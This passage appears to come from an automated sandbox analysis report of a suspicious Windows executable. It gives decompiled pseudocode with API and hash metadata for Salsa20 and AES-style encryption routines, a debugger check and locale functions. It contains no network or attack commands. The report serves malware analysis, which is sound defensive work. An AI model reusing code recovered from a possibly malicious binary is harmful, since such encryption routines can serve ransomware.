                                                                                    							asm("rol eax, 0x9");
                                                                                    							_v28 = _v28 ^ _t217 + _v20;
                                                                                    							_t219 = _v28;
                                                                                    							_v116 = _t219;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_t262 = _v40 ^ _t219 + _v24;
                                                                                    							_v40 = _t262;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_v112 = _t262;
                                                                                    							_t264 = _v20 ^ _v28 + _t262;
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_v44 = _v44 ^ _v32 + _v12;
                                                                                    							_t225 = _v44;
                                                                                    							_v100 = _t225;
                                                                                    							asm("rol eax, 0x9");
                                                                                    							_v20 = _t264;
                                                                                    							_v124 = _t264;
                                                                                    							_t266 = _v48 ^ _t225 + _v32;
                                                                                    							_v48 = _t266;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_v12 = _v12 ^ _v44 + _t266;
                                                                                    							_t229 = _v12;
                                                                                    							_v108 = _t229;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_v96 = _t266;
                                                                                    							_t268 = _v32 ^ _t229 + _t266;
                                                                                    							_v32 = _t268;
                                                                                    							_v104 = _t268;
                                                                                    							_t269 = _v36;
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_t294 = _t295 ^ _v8 + _t269;
                                                                                    							asm("rol eax, 0x9");
                                                                                    							_v16 = _v16 ^ _v8 + _t294;
                                                                                    							_t235 = _v16;
                                                                                    							_v92 = _t235;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_t270 = _t269 ^ _t235 + _t294;
                                                                                    							_t237 = _t270;
                                                                                    							_v36 = _t270;
                                                                                    							_v88 = _t237;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_v8 = _v8 ^ _t237 + _v16;
                                                                                    							_v84 = _v8;
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_t252 = _v52 ^ _t277 + _t289;
                                                                                    							_v52 = _t252;
                                                                                    							_v76 = _t252;
                                                                                    							asm("rol eax, 0x9");
                                                                                    							_t298 = _t299 ^ _t277 + _t252;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_t288 = _t289 ^ _t298 + _t252;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_t276 = _t277 ^ _t288 + _t298;
                                                                                    							_t138 =  &_v60;
                                                                                    							 *_t138 = _v60 - 1;
                                                                                    							_t186 = _v20;
                                                                                    						} while ( *_t138 != 0);
                                                                                    						_t272 = _a4;
                                                                                    						_t244 = 0;
                                                                                    						_v80 = _t294;
                                                                                    						_t296 = _a8;
                                                                                    						_v64 = _t276;
                                                                                    						_v68 = _t288;
                                                                                    						_v72 = _t298;
                                                                                    						do {
                                                                                    							_t301 =  &_v190 + _t244;
                                                                                    							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
                                                                                    							_t290 =  *(_t305 + _t244 - 0x78);
                                                                                    							 *((char*)(_t301 - 1)) = _t290 >> 8;
                                                                                    							 *(_t305 + _t244 - 0xbc) = _t290;
                                                                                    							_t244 = _t244 + 4;
                                                                                    							 *_t301 = _t290 >> 0x10;
                                                                                    							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
                                                                                    							_t313 = _t244 - 0x40;
                                                                                    						} while (_t313 < 0);
                                                                                    						_t284 = _v56;
                                                                                    						_t292 = _a12;
                                                                                    						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
                                                                                    						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
                                                                                    						_t303 =  >=  ? 0x40 : _t292;
                                                                                    						_t285 = 0;
                                                                                    						if(_t303 == 0) {
                                                                                    							goto L12;
                                                                                    						} else {
                                                                                    							goto L10;
                                                                                    						}
                                                                                    						do {
                                                                                    							L10:
                                                                                    							_t292 = _t292 - 1;
                                                                                    							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
                                                                                    							_t285 = _t285 + 1;
                                                                                    							 *_t296 = _t250;
                                                                                    							_t272 =  &(_t272[0]);
                                                                                    							_t296 =  &(_t296[1]);
                                                                                    						} while (_t285 < _t303);
                                                                                    						_a12 = _t292;
                                                                                    						_a4 = _t272;
                                                                                    						_a8 = _t296;
                                                                                    						L12:
                                                                                    						_t248 = _v56;
                                                                                    					} while (_t292 != 0);
                                                                                    					return _t248;
                                                                                    				}
                                                                                    				return _t174;
                                                                                    			}

                                                                                    APIs
                                                                                    Strings
                                                                                    • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                    • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __wassert
                                                                                    • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                    • API String ID: 3993402318-1975116136
                                                                                    • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                    • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                    • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                    • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E00424168(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                    				char _v0;
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v524;
                                                                                    				intOrPtr _v528;
                                                                                    				void* _v532;
                                                                                    				intOrPtr _v536;
                                                                                    				char _v540;
                                                                                    				intOrPtr _v544;
                                                                                    				intOrPtr _v548;
                                                                                    				intOrPtr _v552;
                                                                                    				intOrPtr _v556;
                                                                                    				intOrPtr _v560;
                                                                                    				intOrPtr _v564;
                                                                                    				intOrPtr _v568;
                                                                                    				intOrPtr _v572;
                                                                                    				intOrPtr _v576;
                                                                                    				intOrPtr _v580;
                                                                                    				intOrPtr _v584;
                                                                                    				char _v724;
                                                                                    				intOrPtr _v792;
                                                                                    				char _v800;
                                                                                    				signed int _v804;
                                                                                    				intOrPtr _v808;
                                                                                    				char _v812;
                                                                                    				void* __edi;
                                                                                    				signed int _t41;
                                                                                    				char* _t46;
                                                                                    				char* _t48;
                                                                                    				intOrPtr _t59;
                                                                                    				intOrPtr _t60;
                                                                                    				intOrPtr _t65;
                                                                                    				intOrPtr _t66;
                                                                                    				int _t67;
                                                                                    				intOrPtr _t68;
                                                                                    				signed int _t69;
                                                                                    
                                                                                    				_t68 = __esi;
                                                                                    				_t65 = __edx;
                                                                                    				_t59 = __ebx;
                                                                                    				_t41 =  *0x50ad20; // 0x84f4da2
                                                                                    				_t42 = _t41 ^ _t69;
                                                                                    				_v8 = _t41 ^ _t69;
                                                                                    				if(_a4 != 0xffffffff) {
                                                                                    					_push(_a4);
                                                                                    					E00432A69(_t42);
                                                                                    					_pop(_t60);
                                                                                    				}
                                                                                    				_v804 = _v804 & 0x00000000;
                                                                                    				E0042B420( &_v800, 0, 0x4c);
                                                                                    				_v812 =  &_v804;
                                                                                    				_t46 =  &_v724;
                                                                                    				_v808 = _t46;
                                                                                    				_v548 = _t46;
                                                                                    				_v552 = _t60;
                                                                                    				_v556 = _t65;
                                                                                    				_v560 = _t59;
                                                                                    				_v564 = _t68;
                                                                                    				_v568 = _t66;
                                                                                    				_v524 = ss;
                                                                                    				_v536 = cs;
                                                                                    				_v572 = ds;
                                                                                    				_v576 = es;
                                                                                    				_v580 = fs;
                                                                                    				_v584 = gs;
                                                                                    				asm("pushfd");
                                                                                    				_pop( *_t23);
                                                                                    				_v540 = _v0;
                                                                                    				_t48 =  &_v0;
                                                                                    				_v528 = _t48;
                                                                                    				_v724 = 0x10001;
                                                                                    				_v544 =  *((intOrPtr*)(_t48 - 4));
                                                                                    				_v804 = _a8;
                                                                                    				_v800 = _a12;
                                                                                    				_v792 = _v0;
                                                                                    				_t67 = IsDebuggerPresent();
                                                                                    				if(E004329EC( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                                                    					_push(_a4);
                                                                                    					E00432A69(_t55);
                                                                                    				}
                                                                                    				return E0042A77E(_t59, _v8 ^ _t69, _t65, _t67, _t68);
                                                                                    			}

                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0042419D
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DebuggerPresent_memset
                                                                                    • String ID: i;B
                                                                                    • API String ID: 2328436684-472376889
                                                                                    • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                    • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                    • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                    • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004329EC(struct _EXCEPTION_POINTERS* _a4) {
                                                                                    
                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                    				return UnhandledExceptionFilter(_a4);
                                                                                    			}




                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                    • Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
                                                                                    • Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                    • Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 37%
                                                                                    			E004387C8(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                    				signed int _t5;
                                                                                    				signed int _t6;
                                                                                    				int _t8;
                                                                                    
                                                                                    				_t5 =  *0x5292d8; // 0x7ea30b72
                                                                                    				_t6 = _t5 ^  *0x50ad20;
                                                                                    				if(_t6 == 0) {
                                                                                    					 *0x511344 = _a4;
                                                                                    					_t8 = EnumSystemLocalesW(E004387B4, 1);
                                                                                    					 *0x511344 =  *0x511344 & 0x00000000;
                                                                                    					return _t8;
                                                                                    				} else {
                                                                                    					return  *_t6(_a4, _a8, _a12, 0);
                                                                                    				}
                                                                                    			}







                                                                                    APIs
                                                                                    • EnumSystemLocalesW.KERNEL32(004387B4,00000001,?,004376BC,0043775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004387F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2099609381-0
                                                                                    • Opcode ID: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
                                                                                    • Instruction ID: e2c19f37e5f1fa56fd16d2c75426893bf8b780345540c0397aa12dc95392e8cd
                                                                                    • Opcode Fuzzy Hash: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
                                                                                    • Instruction Fuzzy Hash: 4DE08C32150308FBCF21CFA0EC41FD83BA6BB58710F104419F61C4AA60CB71A964EB48
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,?,0042580F,?,0042580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00438875
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
                                                                                    • Instruction ID: 4201596fe771204303fc80694ffa3c51b65a798dd9aa63856d52ff29377aa1ed
                                                                                    • Opcode Fuzzy Hash: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
                                                                                    • Instruction Fuzzy Hash: 7ED0173200020CFF8F01AFE1EC45C6A7B69FF0C314B180409FA1C45120DA36A820EB25
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004329BB(_Unknown_base(*)()* _a4) {
                                                                                    
                                                                                    				return SetUnhandledExceptionFilter(_a4);
                                                                                    			}




                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                    • Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
                                                                                    • Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                    • Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040A710(void* __ecx) {
                                                                                    				signed int _v5;
                                                                                    				unsigned int _v6;
                                                                                    				signed int _v7;
                                                                                    				unsigned int _v8;
                                                                                    				signed int _v9;
                                                                                    				signed int _v10;
                                                                                    				signed int _v11;
                                                                                    				signed int _v12;
                                                                                    				signed int _v13;
                                                                                    				signed int _v14;
                                                                                    				signed int _t256;
                                                                                    				signed int _t342;
                                                                                    				signed int _t345;
                                                                                    				signed char _t371;
                                                                                    				unsigned char _t372;
                                                                                    				unsigned char _t376;
                                                                                    				signed int _t391;
                                                                                    				unsigned char _t400;
                                                                                    				unsigned char _t409;
                                                                                    				signed char _t519;
                                                                                    				void* _t599;
                                                                                    				signed char* _t600;
                                                                                    
                                                                                    				_t600 = __ecx + 2;
                                                                                    				_t599 = 4;
                                                                                    				do {
                                                                                    					_t391 =  *(_t600 - 2);
                                                                                    					_v7 = 0x1b;
                                                                                    					_v12 = _t391;
                                                                                    					_t372 =  *(_t600 - 1);
                                                                                    					_v14 = 0x1b;
                                                                                    					_v6 = _t391 + _t391 ^ 0x0000001b;
                                                                                    					_v10 = _t372;
                                                                                    					_v9 =  *_t600;
                                                                                    					_t400 = _t372 + _t372 ^ (_t372 >> 0x00000007) * 0x0000001b;
                                                                                    					_v5 = _t400;
                                                                                    					_t256 = (_t400 >> 7) * 0x1b >> 0x20 >> 7;
                                                                                    					_t376 = _t256 * 0x1b;
                                                                                    					_v11 = (_t256 * 0x0000001b >> 0x00000020) + (_t256 * 0x0000001b >> 0x00000020) ^ _t376;
                                                                                    					_t409 = _v7 + _v7 ^ 0x0000001b;
                                                                                    					_v13 = 0x1b;
                                                                                    					_v8 = _t409;
                                                                                    					 *(_t600 - 2) = ((0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) + (0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) ^ ((0x0000001b ^ _t409 + _t409) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _t409 + _t409) >> 0x00000007) * ((0x0000001b ^ _t409 + _t409) >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (_v11 >> 0x00000007) * 0x0000001b ^ (_t376 >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) + (0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) ^ ((0x0000001b ^ _t409 + _t409) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _t409 + _t409) >> 0x00000007) * ((0x0000001b ^ _t409 + _t409) >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (_v11 >> 0x00000007) * 0x0000001b ^ (_t376 >> 0x00000007) * 0x0000001b) * 0x0000001b ^ (_v6 >> 0x00000007) * 0x0000001b ^ (_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 ^ _v14 ^ _v7 ^ _v9 ^ _v10;
                                                                                    					 *(_t600 - 1) = ((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b) * 0x0000001b ^ 0x0000001b ^ (((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 
^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b) * 0x0000001b >> 0x00000020 ^ _v7 ^ _v9 ^ _v12;
                                                                                    					_t342 = _v6 >> 7;
                                                                                    					_t345 = _t342 * 0x1b >> 0x20 >> 7;
                                                                                    					 *_t600 = ((0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) + (0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) ^ ((0x0000001b ^ _v8 + _v8) >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ 
